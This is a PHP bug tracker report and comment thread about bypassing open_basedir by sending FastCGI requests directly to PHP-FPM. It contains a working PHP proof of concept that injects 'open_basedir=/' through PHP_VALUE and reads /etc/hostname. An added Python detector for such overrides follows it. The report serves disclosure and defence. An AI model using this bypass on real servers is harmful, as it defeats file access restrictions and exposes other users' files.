Request #70134 open_basedir bypass with IP-based PHP-FPM
Submitted: 2015-07-24 20:41 UTC
Modified: 2021-12-04 18:22 UTC
Votes: 5
Avg. Score: 3.8 ± 1.0
Reproduced: 1 of 1 (100.0%)
Same Version: 0 (0.0%)
Same OS: 0 (0.0%)
From: butesa at freenet dot de
Assigned: bukka
Status: Assigned
Package: FPM related
PHP Version: 5.5.27
OS: Ubuntu
Private report: No
CVE-ID: None
 [2015-07-24 20:41 UTC] butesa at freenet dot de
Description:
------------
Please change the implementation of PHP_VALUE so that open_basedir can only be tightened, but not loosened (as it is already implemented with ini_set()).

At the moment, you can bypass open_basedir by connecting to the FPM port.

Test script:
---------------
<?php
echo 'START ';
echo ini_get('open_basedir');
echo file_get_contents('/etc/hostname');
echo ' END';
echo '<br/>';

if (isset($_GET['stop'])) exit;

$params = array();
$params['SCRIPT_NAME'] = $_SERVER['SCRIPT_NAME'];
$params['SCRIPT_FILENAME'] = $_SERVER['SCRIPT_FILENAME'];
$params['REQUEST_METHOD'] = 'GET';
$params['QUERY_STRING'] = 'stop=true';
$params['PHP_VALUE'] = 'open_basedir=/';

$params_encoded = '';
foreach ($params as $k=>$v) {
	$params_encoded.= chr(strlen($k)).chr(strlen($v)).$k.$v;
}

$len = strlen($params_encoded);
$len_encoded = chr($len >> 8).chr($len & 255);

$fp = fsockopen('127.0.0.1',9000);
fwrite($fp, "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00");
fwrite($fp, "\x01\x04\x00\x01".$len_encoded."\x00\x00".$params_encoded);
fwrite($fp, "\x01\x04\x00\x01\x00\x00\x00\x00");
fwrite($fp, "\x01\x05\x00\x01\x00\x00\x00\x00");
sleep(2);
$result = '';
while (!feof($fp)) {
  $result .= fread($fp, 1024);
}
fclose($fp);

$matches = array();
preg_match('/START.*END/s', $result, $matches);
echo $matches[0];

Expected result:
----------------
[shortened for better readability]

START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END
START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END

Actual result:
--------------
START /var/www/html/
Warning: file_get_contents(): open_basedir restriction in effect.
END
START / my_hostname END


Don't be surprised, you may also encounter bug 63965. In that case, the output will look like this:

START / my_hostname END
START / my_hostname END
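
For monitoring the behaviour reported above, the following is an added example (not part of the original report and not PHP project code): it decodes FastCGI PARAMS records from a byte stream and reports requests whose PHP_VALUE or PHP_ADMIN_VALUE sets open_basedir. It goes beyond the test script by also handling 4-byte name/value lengths and truncated input. Assumptions: the input is a reassembled client-to-FPM stream from your own capture, PHP_ADMIN_VALUE does not appear in the report and is included as the admin counterpart of PHP_VALUE, and the function names and sample bytes are constructed for illustration.

```python
import struct

FCGI_PARAMS = 4                                # record type that carries name-value pairs
INI_PARAMS = ("PHP_ADMIN_VALUE", "PHP_VALUE")  # params PHP-FPM parses as ini settings

def read_len(buf, pos):
    """A length is 1 byte, or 4 bytes when the first byte has its high bit set."""
    if buf[pos] & 0x80:
        return struct.unpack_from(">I", buf, pos)[0] & 0x7FFFFFFF, pos + 4
    return buf[pos], pos + 1

def decode_pairs(buf):
    """Decode FastCGI name-value pairs, stopping at the first malformed one."""
    pairs, pos = {}, 0
    while pos < len(buf):
        try:
            nlen, pos = read_len(buf, pos)
            vlen, pos = read_len(buf, pos)
        except (IndexError, struct.error):     # length field cut short
            break
        if pos + nlen + vlen > len(buf):       # pair runs past the captured data
            break
        name, value = buf[pos:pos + nlen], buf[pos + nlen:pos + nlen + vlen]
        pairs[name.decode("latin-1")] = value.decode("latin-1")
        pos += nlen + vlen
    return pairs

def ini_overrides(stream, directive="open_basedir"):
    """Return (request_id, param, ini_line) for each request that sets `directive`."""
    merged, pos = {}, 0
    while pos + 8 <= len(stream):              # walk the 8-byte record headers
        _v, rtype, req_id, clen, plen, _r = struct.unpack_from(">BBHHBB", stream, pos)
        if rtype == FCGI_PARAMS:               # PARAMS may span several records
            merged[req_id] = merged.get(req_id, b"") + stream[pos + 8:pos + 8 + clen]
        pos += 8 + clen + plen
    hits = []
    for req_id, buf in merged.items():
        pairs = decode_pairs(buf)
        for name in INI_PARAMS:
            for line in pairs.get(name, "").splitlines():
                if line.split("=", 1)[0].strip() == directive:
                    hits.append((req_id, name, line.strip()))
    return hits

# Constructed sample capture (not from the report): a PARAMS record, then its terminator.
_body = (b"\x0f\x17SCRIPT_FILENAME/var/www/html/index.php"
         b"\x09\x0ePHP_VALUEopen_basedir=/")
SAMPLE = (struct.pack(">BBHHBB", 1, FCGI_PARAMS, 1, len(_body), 0, 0) + _body
          + struct.pack(">BBHHBB", 1, FCGI_PARAMS, 1, 0, 0, 0))
```

Calling `ini_overrides(SAMPLE)` returns one hit for request 1; a web server that legitimately passes PHP_VALUE to FPM will also show up here, so compare hits against the values your own front end is configured to send.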

 [2015-07-24 20:46 UTC] butesa at freenet dot de
Sorry, I didn't mean to make this bug report private. There is no sensible information in it.
 [2015-09-28 23:04 UTC] stas@php.net
-Assigned To: +Assigned To: fat
 [2017-10-24 07:45 UTC] kalle@php.net
-Status: Assigned +Status: Open -Assigned To: fat +Assigned To:
 [2018-01-19 19:40 UTC] bohu at cryp dot email
This critical security issue is still present in PHP 7.0.
At least on Debian Stretch PHP 7.0.27-0+deb9u1.

Any plan to patch it?
Thx!
 [2020-01-14 21:45 UTC] diego dot blanco at treitos dot com
Additionally, it seems that open_basedir is bypassed by fsockopen when using unix sockets, so this is also exploitable with unix sockets.
 [2021-07-12 15:41 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2021-07-12 15:41 UTC] cmb@php.net
open_basedir bypasses are not considered to be security issues;
cf. <https://externals.io/message/105606>
and <https://externals.io/message/115406>.
 [2021-12-04 18:22 UTC] bukka@php.net
-Status: Open +Status: Assigned -Type: Bug +Type: Feature/Change Request -Assigned To: +Assigned To: bukka
 [2021-12-04 18:22 UTC] bukka@php.net
This is a feature request as this behaviour is on purpose.